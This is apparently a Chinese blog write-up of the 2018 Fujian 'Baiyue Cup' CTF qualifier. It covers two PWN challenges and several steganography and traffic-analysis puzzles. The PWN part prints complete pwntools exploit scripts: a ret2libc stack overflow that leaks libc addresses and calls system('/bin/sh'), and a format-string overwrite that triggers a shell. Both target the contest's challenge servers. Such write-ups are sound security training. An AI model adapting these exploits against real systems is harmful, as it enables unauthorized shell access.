2018福建省“百越杯”CTF初赛writeup

最新推荐文章于 2022-12-11 11:27:21 发布
最新推荐文章于 2022-12-11 11:27:21 发布
阅读量4.4k 收藏 2
点赞数 3
分类专栏: writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sweet0swat/article/details/84730060
版权

2018福建省“百越杯”CTF初赛writeup

PWN

Boring Game

题目描述 nc 117.50.59.220 12345
解题经过下载下来后有两个文件pwnlibc.so.6。所以很明显是RET2LIBC的类型

检查文件安全性

在这里插入图片描述

程序源代码
int __cdecl main(int argc, const char **argv, const char **envp)
{
  write(1, "Hello, welcome to a boring game.\n", 0x22u);
  fflush(_bss_start);
  game();
  return 0;
}

int game()
{
  int v1; // [esp+0h] [ebp-58h]
  char buf[64]; // [esp+4h] [ebp-54h]
  int v3; // [esp+44h] [ebp-14h]
  unsigned int seed; // [esp+48h] [ebp-10h]
  ssize_t v5; // [esp+4Ch] [ebp-Ch]

  puts("What's your name ?");
  fflush(_bss_start);
  v5 = read(0, buf, 0x80u);
  if ( v5 <= 64 )
    buf[v5 - 1] = 0;
  printf("Hi ,%s.  Let's play a game.\nCan you guess a number ? (0 - 1024)\n", buf);
  fflush(_bss_start);
  seed = time(0);
  srand(seed);
  v3 = rand() % 1025;
  __isoc99_scanf("%d", &v1);
  if ( v1 == v3 )
    printf("Why are so niubi! number is %d\n", v3);
  else
    printf("Sorry, you only have one chance here.\nnumber is %d\n", v3);
  return fflush(_bss_start);
}

相关函数:

在这里插入图片描述

解题思路

step1: 获取write函数的地址
step2: 获取write函数在Libc里面的的偏移
step3: 计算出基地址
step4: 获取system和“/bin/sh”的偏移
step5: 计算system和"/bin/sh”的地址
最后getshell

测量溢出长度

测量得padding88个无效字符后可以控制EIP

获取write函数的地址

因为write函数一开始就已经使用过,所以这个时候的got表的内容是真实的地址
可以使用ELF导入libc后用got函数进行获取
或者objdump出汇编代码找到如下信息:

08048420 <read@plt>:
 8048420:	ff 25 0c a0 04 08    	jmp    DWORD PTR ds:0x804a00c
 8048426:	68 00 00 00 00       	push   0x0
 804842b:	e9 e0 ff ff ff       	jmp    8048410 <.plt>

其中0x804a00c就是write函数在got表中的地址

获取write函数的偏移

这里使用pwntools的elf导入libc库,再用symbols进行定位

from pwn import *
libc = ELF('libc.so.6')
write_off = libc.symbols['write']
计算基地址

这里就要开始构造payload,目的是让函数在返回的时候控制EIP让它跳转到puts函数,然后把write函数的got表中的值泄露出来。
payload = 'a'*88 + p32(puts_addr) + p32(main_addr) + p32(write_got)
泄露之后用真实地址减去偏移就可以得到基地址
base_addr = write_addr - write_off

计算system和"/bin/sh"地址
from pwn import *
libc = ELF('libc.so.6')
write_off = libc.symbols['system']
bin_sh_off = libc.search('/bin/sh').next()
system_addr = system_off + base_addr 
bin_sh_addr = bin_sh_off + base_addr
EXP
from pwn import *

#context.log_level = 'debug' 

libc = ELF('libc.so.6')
p = remote('117.50.59.220',12345)
puts_addr = 0x08048460
main_addr = 0x080486f9
write_off = libc.symbols['write']
system_off = libc.symbols['system']
bin_sh_off = libc.search('/bin/sh').next()
write_got = 0x804a028
#log.info(hex(put_got))
log.info('write_off: '+hex(write_off))
log.info('system_off: '+hex(system_off))
log.info('bin_sh_off: '+hex(bin_sh_off))

payload = 'a'*88 + p32(puts_addr) + p32(main_addr) + p32(write_got)
p.recvuntil(" ?")
p.send(payload)
p.recvuntil('? (0 - 1024)\n')
sleep(0.5)
p.sendline('1')

print p.recv()
recvinfo = p.recv().split('\n')[1].replace('\x00','')
write_addr = u32(recvinfo)
log.info(hex(write_addr))
base_addr =  write_addr - write_off
system_addr = system_off + base_addr 
bin_sh_addr = bin_sh_off + base_addr

print "[*] Got baseaddr =",hex(base_addr)
print "[*] Got execveaddr =",hex(system_addr)
print "[*] Got /bin/sh addr =",hex(bin_sh_addr)

payload2 = 'a'*88 + p32(system_addr) + p32(main_addr) + p32(bin_sh_addr)
p.sendline(payload2)
p.recvuntil('? (0 - 1024)\n')
p.sendline('1')

p.interactive()
细节处理

这里连上服务器之后,在传回来的数据中,泄露的write函数地址会接在其他字符串后面,所以需要处理一下。
在本地测试的时候传回来的数据内容略有不同,所以如果要在本地调试的话,截取write函数的地址的代码需要做修改。
在这里插入图片描述

Format

这题几乎是原题,很简单的格式化字符串漏洞题目。

题目描述 Maybe wo gen boring nc 117.50.13.182 33865

解题经过

程序源代码:
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [esp+1Ch] [ebp-8Ch]
  unsigned int v5; // [esp+9Ch] [ebp-Ch]

  v5 = __readgsdword(0x14u);
  memset(&s, 0, 0x80u);
  fgets(&s, 128, stdin);
  printf(&s);
  if ( secret == 192 )
    give_shell();
  else
    printf("Sorry, secret = %d\n", secret);
  return 0;
}

int give_shell()
{
  __gid_t v0; // ST1C_4

  v0 = getegid();
  setresgid(v0, v0, v0);
  return system("/bin/sh -i");
}

漏洞点在printf(&s),所以可以用%x&n对目标地址中的值进行改写。

本题不需要测量溢出长度,但是需要测量泄露的地址中的内容是从哪里开始是我们需要的:
在这里插入图片描述所以输入的开始部分是从第11个开始

EXP
from pwn import *
#context.log_level = 'debug'

r = remote('117.50.13.182',33865)
#r = process('./format')

payload1 = p32(0x0804A048)+'%188u%11$n'
#print payload1 
r.sendline(payload1)
print r.recv()

r.interactive()

MISC

马男波杰克

题目描述 马男说了要学会百度
在这里插入图片描述
解题经过

直接使用在线的工具即可

http://www.atool.org/steganography.php

在这里插入图片描述

签到题

题目描述 欢迎参加百越杯,首先我们得放轻松,活动一下脑经,比如做做数独怎么样?flag格式:flag{全部数字排成一行(横向81位)的小写md5值}
在这里插入图片描述
解题经过

偷个懒,使用在线数独求解器求解数独

http://www.llang.net/sudoku/calsudoku.html

在这里插入图片描述
flag{cee3860fb3f4a52e615fa8aaf3c91f2b}

血小板天下第一可爱

题目描述 听过LSB隐写吗?
在这里插入图片描述在这里插入图片描述

解题经过

首先补全残缺的二维码,得到key: Lsb_1s_gr3at
之后到如下地址下载解密还原脚本

python lsb.py extract 1.png 1.txt Lsb_1s_gr3at

再用python lsb.py extract 1.png flag.txt Lsb_1s_gr3at把flag还原出来:
在这里插入图片描述

flag_universe

题目描述 please find the flag in our universe!

解题经过

打开流量包,使用筛选器筛出ftp数据流
在这里插入图片描述
然后追踪tcp流量,分析后发现是有上传和下载universe.png的操作,逐一提取出来:
在这里插入图片描述
之后发现up01.png图片存在lsb隐写:

在这里插入图片描述

Tr@cer
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。目录 ...
[CTF] 2018-百越-Misc-血小板天下第一可爱
ZXW_NUDT的博客
08-15 1554
[CTF] 2018-百越-Misc-血小板天下第一可爱
百越 Reverse (crazy write up)
X丶 的博客
12-07 1109
拿到程序后,先常规跑一跑: 然后我就把它扔到IDA看看 IDA SHIFT + F12 看到flag关键字,于是我就点击进去,并查看交叉引用 由此分析可以得出,flag可能是在if判断正确后输出的 于是,接下来我们分析一下判断函数 getSerial() 可以看出,大概就是对this所指向的字符进行逐个对比验证。 即 this[16 + i]  与  this[80 ...
CTF|pwn栈溢出入门题level3解题思路及个人总结
skyattractive的博客
06-02 2203
CTF|pwn栈溢出入门题level3解题思路及个人总结 解题思路 拿到题目将文件下载下来拖入ubuntu 发现这一次的文件比较特殊:是一个linux环境下的压缩包,自然而然想到的是解压它 通过命令行tar -xvf level.tar 将其解压出来 发现有两个文件:level和libc 都拖入IDA 特殊的地方在:本题没有直接给出system和bin/sh的位置,但是文件中有个write函数可以利用 我们IDA打开libc文件(关于libc文件是什么有什么 会在总结写到) 总体思路为:我们通过r
[HarekazeCTF2019]baby_rop2 1(含libc.so.6文件)(一些问题有待解决)
weixin_52111404的博客
12-11 651
题时遇到了不少问题,有些还没有得到解决,在此进行记录
2018百越”第四届福建省高校网络空间安全大赛部分题目writeup
You
12-02 5673
2018百越”第四届福建省高校网络空间安全大赛writeup 0x00题目存档: 链接: https://pan.baidu.com/s/1v59VfheEC5XY8vyKvgEX3Q 提取码: bbfi 0x01题目名称:签到 操作内容: Step 0:题目信息 Step 1:九乘九矩阵加密分析 莫名其妙就想到了矩阵加密,百度搜了半天的解密方法也没找到…还好队友做出来了,不然肯定会在这个题...
2018第二届强网线上赛ctf web writeup(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
CTF安全大赛必刷题
2018强网CTF-题目整理.zip
最新发布
12-17
2018强网CTF___题目整理
领航 CTF 2021 决赛 真题 7z
12-07
领航 CTF 2021 决赛
2020YCBCTF羊城官方Writeup.pdf
10-28
2020YCBCTF羊城官方Writeup.pdf
libc.so.6_x86
02-24
2016年的Seccon ctf pwn题cheer_msg的libc库文件。
CTF泄漏libc基址的方法
liucc09的博客
01-05 3783
泄漏libc 重点: glibc 的后三位是固定的 main_arena泄漏法 main_arena存储在libc.so.6文件的.data段,通过这个偏移我们就可以获取libc的基址,使用IDA打开libc文件,然后搜索函数malloc_trim() [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-a8DgTYcd-1609837106507)(D:\04_笔记\images\main_arena.png)] [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接
【BugkuCTF】Crypto--告诉你个秘密(ISCCCTF)
VZZmieshenquan的博客
02-13 684
Description: 636A56355279427363446C4A49454A7154534230526D6843 56445A31614342354E326C4B4946467A5769426961453067 Solution: 16进制ASCII码解码再Base64解码然后看键盘,四个字母包围一个英文字母,都找出来就行了 Flag: TONGYUAN ...
攻防世界 Misc高手进阶区 3分题 flag_universe
闵行小鱼塘
11-09 2083
继续ctf的旅程,攻防世界Misc高手进阶区的3分题,本篇是flag_universe的writeup
第四届百越misic题目2018
dengshanyi7201的博客
12-07 458
1.波杰克 (文件名字为atool)网址:http://www.atool.org/steganography.php 搜一下atool在线工具既能得到flag 2.血小板天下第一可爱 得到的二维码扫一下得到base64密文信息,然后decode lsb解密脚本下载:https://g...
2018第四届百越AWD总结
qq_35661990的博客
12-18 1074
之前准备的waf和监控脚本都没用上,因为上了脚本后三台web服务器都变成了异常,但听学长都能用,所以不知道是哪里出了问题,之后都在忙着做pwn题和写脚本,以及手动上传flag,导致四台服务器全程裸奔,上午一度掉到了倒数四十多名,也就是倒数第三,所幸福建省内的pwn手较少,下午也是靠着pwn服务器进了前20名,拿了个优胜奖。 这一次自身的不足: 第一点是脚本编写能力不足,在没有网络的情况下没办法...
2018 百越 pwn(format WriteUp)
X丶 的博客
12-03 757
看到题目的内容,就知道大概是格式化漏洞了, 上扔到IDA看个究竟。 不出所料,就是printf的格式化输出漏洞   思路: 1、利用格式化漏洞覆盖任意地址的值,这里我们需要覆盖secret的值,所以先要找到secret的地址,在IDA中,可以看到secret在bss段: 得到secret的地址后,我们就可以对它的值进行覆盖,覆盖成192 2、利用%k$n(k$用于获取格式化...
2018第四届百越CTF总结-pwn(附带python调用gdb小技巧)
qq_35661990的博客
12-20 1680
这次做了一题逆向和pwn,不过做出的逆向太简单了就不多了,倒是借着两题最基础的pwn题好好学习了一下ret2lib和ret2plt,以及格式化字符串漏洞。只是写payload的话,照着ctf wiki上的改几个地址就可以了。 Boring game 考察基础的ret2libc和ret2plt,在google上找到一篇把ret2libc基础讲得很好的文章 https://www.shellb...
CTFHub-历年真题-RSA(2018-百越-Crypto-RSA)
qtL0ng的博客
04-15 802
题目给了公钥文件pubkey.pem和密文flag.enc,还有下面的加密算法: #!/usr/bin/env python3 import gmpy2 from Crypto.Util.number import getPrime from Crypto.PublicKey import RSA from Crypto.Cipher import PKCS1_v1_5 from base64 import b64encode flag = open('flag', 'r').read().strip()
福建闽盾 ctf比赛题目
08-26
福建闽盾CTF比赛题目是指“福建”和“闽盾”这两个关键词所组成的CTF比赛的题目。CTF(Capture The Flag,夺旗赛)是一种网络安全竞赛,旨在考验选手在网络攻防和信息安全方面的技能。 福建作为一个华南沿海省份,具有独特的地理、人文和历史背景。以此为题目,可以设计与福建相关的题目,如“福建的历史文化”、“福建的名胜古迹”、“福建特色美食”等等。选手在解答题目过程中,需要了解福建的相关知识,并运用自己的搜索、分析和解决问题的能力,最终找到答案。 而“闽盾”是指福建省网络安全协会举办的一项CTF比赛。我无法提供具体的题目,因为每届比赛的题目都不同,涵盖的领域也各有不同。根据以往比赛的经验,题目的类型可以包括密码学、网站漏洞、二进制安全、逆向工程、隐写术等等。选手需要在限定时间内根据提示或已给出的信息,分析、解决问题并提交答案。 CTF比赛旨在提高选手的网络安全技能、加深对信息安全的理解和运用,并且培养团队合作和应急响应的能力。福建闽盾作为一项有影响力的CTF比赛,吸引了许多对网络安全感兴趣的人士参与。参赛者可以通过参加该比赛,不断学习、提升自己的技术水平,同时也为网络安全事业贡献力量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值